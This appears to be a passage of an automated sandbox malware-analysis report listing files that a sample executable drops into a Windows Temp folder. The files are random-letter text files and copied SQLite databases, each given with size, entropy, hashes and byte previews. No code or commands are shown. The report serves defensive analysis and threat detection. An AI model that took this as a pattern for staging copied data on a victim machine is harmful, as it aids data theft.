Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\Temp\tmp58F3.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmp5D0B.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5D1B.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5D2C.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5D2D.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5D2E.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5D3E.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7B42.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8ED9.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmp8EDA.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\Temp\tmp8EEA.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\Temp\tmp8F1A.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmp8F1B.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmp96FD.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp96FE.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp970E.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
